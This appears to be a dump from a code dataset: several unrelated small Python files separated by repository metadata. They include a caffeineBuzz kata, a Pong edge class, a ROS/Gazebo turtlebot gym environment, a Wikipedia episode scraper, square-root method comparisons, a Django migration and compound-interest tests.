def caffeineBuzz(n):
"""
Complete the function caffeineBuzz, which takes a non-zero integer as its one argument.
If the integer is divisible by 3, return the string "Java".
If the integer is divisible by 3 and divisible by 4, return the string "Coffee"
If the integer is one of the above and is even, add "Script" to the end of the string.
Otherwise, return the string "mocha_missing!"
caffeineBuzz(1) => "mocha_missing!"
caffeineBuzz(3) => "Java"
caffeineBuzz(6) => "JavaScript"
caffeineBuzz(12) => "CoffeeScript"
"""
if n % 3 == 0:
if n % 4 == 0:
if n % 2 == 0:
return 'CoffeeScript'
else:
return 'Coffee'
else:
if n % 2 == 0:
return 'JavaScript'
else:
return 'Java'
else:
return 'mocha_missing!'
def test_caffeineBuzz():
assert caffeineBuzz(1) == 'mocha_missing!'
assert caffeineBuzz(3) == 'Java'
assert caffeineBuzz(6) == 'JavaScript'
assert caffeineBuzz(12) == 'CoffeeScript'
if __name__ == "__main__":
main()
|
[
"jeff.washcloth@gmail.com"
] |
jeff.washcloth@gmail.com
|
3d779742f29c16ee13bfb33d566c6f0d3d9adba2
|
2ee6d6cc371bb1fa3f8703f704715a3a3f430380
|
/edges.py
|
21abf67df6e176037944bd3eb65a5fef455d40b8
|
[] |
no_license
|
maxhugouhr/PongLike
|
db2e84162288a8c5b468806b81cc764d18e05323
|
3426087517013f0fa04164af904b7ce750c14170
|
refs/heads/master
| 2023-03-20T09:33:35.588865
| 2021-03-06T01:47:24
| 2021-03-06T01:47:24
| 323,169,449
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
from surface import Surface
from constants import Constant
import time
class Edge(Surface):
def __init__(self, speed, leftEnd, rightEnd , color, width,reflector,speedMultiplier,defAngle):
super().__init__(speed,leftEnd, rightEnd, color, width, reflector, speedMultiplier, defAngle)
self.isTeleporter = False
self.twin = Surface()
def impact(self,ball):
if ball.lastHitObject != id(self): #ensures the ball can't bounce twice off the same surface
self.lastHitTime = time.time_ns()
ball.lastHitObject = id(self)
if self.isTeleporter:
self.teleport(ball)
else:
self.reflect(ball)
def teleport(self,ball):
fraction = (ball.position[1] - self.leftEndpoint[1]) / self.length
ball.position[0] = self.twin.leftEndpoint[0]
ball.position[1] = fraction * self.twin.length + self.twin.leftEndpoint[1]
ball.lastHitObject = id(self.twin)
def makeTeleporter(self, twin):
self.isTeleporter = True
twin.isTeleporter = True
self.twin = twin
twin.twin = self
|
[
"uhr.max@gmail.com"
] |
uhr.max@gmail.com
|
6dbac82a2398412d3e591e295b6932a3eeabad81
|
06763b248d49851be920fee5e96d6055f04c5f5d
|
/src/open_ai_gym_construct/gym_gazebo/envs/gazebo_maze_turtlebot_lidar.py
|
1b0a52a9738bffd3db05708c16d37305bd2631cd
|
[] |
no_license
|
AT-main/rl_openai_ros
|
46d40c84c64be7e802c3a7ed3da5f945fed8920a
|
f6c22439ff625f41c390e14b86627fdda4b3b450
|
refs/heads/master
| 2022-12-31T19:05:03.341416
| 2020-10-10T20:16:54
| 2020-10-10T20:16:54
| 302,960,031
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,464
|
py
|
import gym
import rospy
import roslaunch
import time
import numpy as np
from gym import utils, spaces
from gym_gazebo.envs import gazebo_env
from geometry_msgs.msg import Twist
from std_srvs.srv import Empty
from sensor_msgs.msg import LaserScan
from gym.utils import seeding
class GazeboMazeTurtlebotLidarEnv(gazebo_env.GazeboEnv):
def __init__(self):
# Launch the simulation with the given launchfile name
gazebo_env.GazeboEnv.__init__(self, "GazeboMazeTurtlebotLidar_v0.launch")
self.vel_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=5)
self.unpause = rospy.ServiceProxy('/gazebo/unpause_physics', Empty)
self.pause = rospy.ServiceProxy('/gazebo/pause_physics', Empty)
self.reset_proxy = rospy.ServiceProxy('/gazebo/reset_simulation', Empty)
self.action_space = spaces.Discrete(3) #F,L,R
self.reward_range = (-np.inf, np.inf)
self._seed()
def discretize_observation(self,data,new_ranges):
discretized_ranges = []
min_range = 0.2
done = False
mod = len(data.ranges)/new_ranges
for i, item in enumerate(data.ranges):
if (i%mod==0):
if data.ranges[i] == float ('Inf'):
discretized_ranges.append(6)
elif np.isnan(data.ranges[i]):
discretized_ranges.append(0)
else:
discretized_ranges.append(int(data.ranges[i]))
if (min_range > data.ranges[i] > 0):
done = True
return discretized_ranges,done
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _step(self, action):
rospy.wait_for_service('/gazebo/unpause_physics')
try:
self.unpause()
except rospy.ServiceException, e:
print ("/gazebo/unpause_physics service call failed")
if action == 0: #FORWARD
vel_cmd = Twist()
vel_cmd.linear.x = 0.25
vel_cmd.angular.z = 0.0
self.vel_pub.publish(vel_cmd)
elif action == 1: #LEFT
vel_cmd = Twist()
vel_cmd.linear.x = 0.05
vel_cmd.angular.z = 0.3
self.vel_pub.publish(vel_cmd)
elif action == 2: #RIGHT
vel_cmd = Twist()
vel_cmd.linear.x = 0.05
vel_cmd.angular.z = -0.3
self.vel_pub.publish(vel_cmd)
data = None
while data is None:
try:
data = rospy.wait_for_message('/kobuki/laser/scan', LaserScan, timeout=5)
except:
print "Time out /kobuki/laser/scan"
pass
rospy.wait_for_service('/gazebo/pause_physics')
try:
#resp_pause = pause.call()
self.pause()
except rospy.ServiceException, e:
print ("/gazebo/pause_physics service call failed")
state,done = self.discretize_observation(data,5)
if not done:
if action == 0:
reward = 3
else:
reward = 1
else:
reward = -200
return state, reward, done, {}
def _reset(self):
# Resets the state of the environment and returns an initial observation.
rospy.wait_for_service('/gazebo/reset_simulation')
try:
#reset_proxy.call()
self.reset_proxy()
except rospy.ServiceException, e:
print ("/gazebo/reset_simulation service call failed")
# Unpause simulation to make observation
rospy.wait_for_service('/gazebo/unpause_physics')
try:
#resp_pause = pause.call()
self.unpause()
except rospy.ServiceException, e:
print ("/gazebo/unpause_physics service call failed")
#read laser data
data = None
while data is None:
try:
data = rospy.wait_for_message('/kobuki/laser/scan', LaserScan, timeout=5)
except:
print "Something went wrong reading /kobuki/laser/scan"
pass
rospy.wait_for_service('/gazebo/pause_physics')
try:
#resp_pause = pause.call()
self.pause()
except rospy.ServiceException, e:
print ("/gazebo/pause_physics service call failed")
state = self.discretize_observation(data,5)
return state
|
[
"amirtajik@gmail.com"
] |
amirtajik@gmail.com
|
77f6eb4b33c65e1b6cef2405872ca24d819e7a93
|
d1507ee333bf9453a197fe997b58871b527811bf
|
/venv/bin/rst2man.py
|
ed1e5f4d0b2f0a71bdbadc1e6014ceae130052f1
|
[] |
no_license
|
hirossan4049/screenshare
|
a336f2cf0e0584866356a82f13683480d9d039f6
|
004f0e649116a6059af19d6489aeb13aed1741f3
|
refs/heads/master
| 2021-01-27T09:21:48.891153
| 2020-04-12T04:55:40
| 2020-04-12T04:55:40
| 243,476,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
#!/Users/linear/Documents/pg/pythonnnnn/screenshare/venv/bin/python
# Author:
# Contact: grubert@users.sf.net
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
|
[
"haruto405329@gmail.com"
] |
haruto405329@gmail.com
|
98765afe90a8d371096186263aeb181ac0d088cc
|
97849f5073755d038f376358d93e46c0677f630f
|
/GOZI4/step40.py
|
b6dbf8080a5666b976fa60f8bb5cb7e9acc5e7e5
|
[] |
no_license
|
hjkornn-phys/DZero
|
871aa1aca3e9887b7a66fc5979be10039a1deb94
|
9f7bcde270da6bcf5e7390d47869872ec78eb0b6
|
refs/heads/main
| 2023-05-14T11:54:04.318930
| 2021-06-07T07:00:14
| 2021-06-07T07:00:14
| 370,917,624
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 384
|
py
|
if "__file__" in globals():
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import numpy as np
from dezero import *
""" x = np.array([[1, 2, 3], [4, 5, 6]])
y = sum_to(x, (1, 3))
print(y)
y = sum_to(x, (2, 1))
print(y) """
x_0 = Variable(np.array([1, 2, 3]))
x_1 = Variable(np.array([10]))
y = x_0 + x_1
print(y)
y.backward()
print(x_1.grad)
|
[
"hjkornn@gmail.com"
] |
hjkornn@gmail.com
|
8c98ceaad7c761fc5f69acd8af7cb795eac0e32c
|
42585715e356b3616b300430ef93d3f977ab5c7b
|
/lesson08/sqrt_cal.py
|
14b90ff7f518b845e2e104c1b5d00fdf3ea21852
|
[] |
no_license
|
hcmMichaelTu/python
|
78d8c9cd22978988c3c573aa82f0dddf34d2d9e1
|
6d3c6214ba44d1279ae484ab32e12869bfe335ae
|
refs/heads/master
| 2023-06-20T13:23:25.921831
| 2020-09-22T11:20:41
| 2020-09-22T11:20:41
| 383,787,369
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 930
|
py
|
import math
def builtin_pow_sqrt(x):
return pow(x, 0.5)
def math_pow_sqrt(x):
return math.pow(x, 0.5)
def exp_operator_sqrt(x):
return x ** 0.5
def Newton_sqrt(x):
y = x
for i in range(100):
y = y/2 + x/(2*y)
return y
def cal_sqrt(method, method_name):
print(f"Tính căn bằng phương pháp {method_name}:")
print(f"a) Căn của 0.0196 là {method(0.0196):.9f}")
print(f"b) Căn của 1.21 là {method(1.21):.9f}")
print(f"c) Căn của 2 là {method(2):.9f}")
print(f"d) Căn của 3 là {method(3):.9f}")
print(f"e) Căn của 4 là {method(4):.9f}")
print(f"f) Căn của {225/256} là {method(225/256):.9f}")
cal_sqrt(math.sqrt, "math’s sqrt")
cal_sqrt(builtin_pow_sqrt, "built-in pow")
cal_sqrt(math_pow_sqrt, "math’s pow")
cal_sqrt(exp_operator_sqrt, "exponentiation operator")
cal_sqrt(Newton_sqrt, "Newton’s sqrt")
|
[
"noreply@github.com"
] |
hcmMichaelTu.noreply@github.com
|
0ac3037411b7aa786fcb2488bb17022c990ab351
|
cb3583cc1322d38b1ee05cb1c081e0867ddb2220
|
/home/migrations/0004_auto_20210409_1110.py
|
11d2ae4cb1d8c4d7d1fece40e5c722c405c4a1e4
|
[
"MIT"
] |
permissive
|
iamgaddiel/codeupblood
|
9e897ff23dedf5299cb59fd6c44d9bd8a645e9c6
|
a0aa1725e5776d80e083b6d4e9e67476bb97e983
|
refs/heads/main
| 2023-05-07T23:34:27.475043
| 2021-04-24T20:49:08
| 2021-04-24T20:49:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 578
|
py
|
# Generated by Django 3.1.6 on 2021-04-09 18:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0003_auto_20210409_1110'),
]
operations = [
migrations.AlterField(
model_name='partner',
name='class_id',
field=models.CharField(default='JkQUX', max_length=150),
),
migrations.AlterField(
model_name='sponsor',
name='class_id',
field=models.CharField(default='qUKNz', max_length=150),
),
]
|
[
"www.spbiology@gmail.com"
] |
www.spbiology@gmail.com
|
233594639eeefe9bbfc2d4d3922529eab7a30057
|
7690d57d0ec12f8da1acf9d86c2648c672f029b4
|
/impress/ch3/bs_2.py
|
8b58037c3eee594378bfedb259248bff8ac96e5c
|
[] |
no_license
|
ducksfrogs/scrayPy
|
27f5b4f1f8d37b9e9e99961fcfa03a65fd7095ea
|
43d05e32f542a24b7d6853809e2094a9d139539d
|
refs/heads/master
| 2022-11-23T02:23:36.125834
| 2020-07-25T21:57:52
| 2020-07-25T21:57:52
| 261,369,274
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 833
|
py
|
import requests
from bs4 import BeautifulSoup
url = 'https://en.wikipedia.org/w/index.php' + \
'?title=List_of_Game_of_Thrones_episodes&oldid=802553687'
r = requests.get(url)
html_contents = r.text
html_soup = BeautifulSoup(html_contents, 'html.parser')
episodes = []
ep_tables = html_soup.find_all('table', class_='wikiepisodetable')
for table in ep_tables:
headers = []
rows = table.find_all('tr')
for header in table.find('tr').find_all('th'):
headers.append(header.text)
for row in table.find_all('tr')[1:]:
values= []
for col in row.find_all(['th', 'td']):
values.append(col.text)
if values:
episode_dict = {headers[i]: values[i] for i in range(len(values))}
episodes.append(episode_dict)
for episode in episodes:
print(episode)
|
[
"ma_yamaki@yahoo.com"
] |
ma_yamaki@yahoo.com
|
4b13a19067049c5152eae0c196d301498feacf47
|
cdf91520568faf2e63ce12b3007cc39f8cf367c1
|
/compound/calculator_test.py
|
bfcf973935c4ee2c7690057c5fc9454711adb2f2
|
[] |
no_license
|
rsarathy/yield-curve
|
664d552a93bddbedab313681014cf2aad51938a8
|
618e27bf6a11f30622e2f81918a0e3769a2224d8
|
refs/heads/master
| 2020-06-15T16:42:56.149511
| 2019-09-02T21:10:49
| 2019-09-02T21:10:49
| 195,344,501
| 0
| 0
| null | 2019-09-02T21:10:50
| 2019-07-05T05:32:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,370
|
py
|
from compound.calculator import monthly_rate, monthly
import unittest
class CompoundTest(unittest.TestCase):
def test_monthly_rate(self):
"""
Checks that monthly_rate() produces the correct monthly growth rate when
given a valid annual growth rate.
"""
# 1.00797414**12 = 1.1
self.assertAlmostEqual(monthly_rate(1.1), 1.00797414)
def test_compound_zero_years(self):
"""
Checks that monthly() produces the initial value of an investment after no
years.
"""
value, contributions = monthly(1000, 100, 1.1, 0)
self.assertEqual(contributions, 1000)
self.assertEqual(value, 1000)
def test_compound_monthly_one_year_no_deposits(self):
"""
Checks that monthly() produces the correct total value of an investment
after a single year, but with no regular monthly deposits.
"""
value, contributions = monthly(1000, 0, 1.1, 1)
self.assertEqual(contributions, 1000)
self.assertAlmostEqual(value, 1100)
def test_compound_monthly_one_year_with_deposits(self):
"""
Checks that monthly() produces the correct total value of an investment
after a single year with regular monthly deposits.
"""
value, contributions = monthly(1000, 100, 1.1, 1)
self.assertEqual(contributions, 2200)
self.assertAlmostEqual(value, 2354.05)
if __name__ == '__main__':
unittest.main()
|
[
"rohit@sarathy.org"
] |
rohit@sarathy.org
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.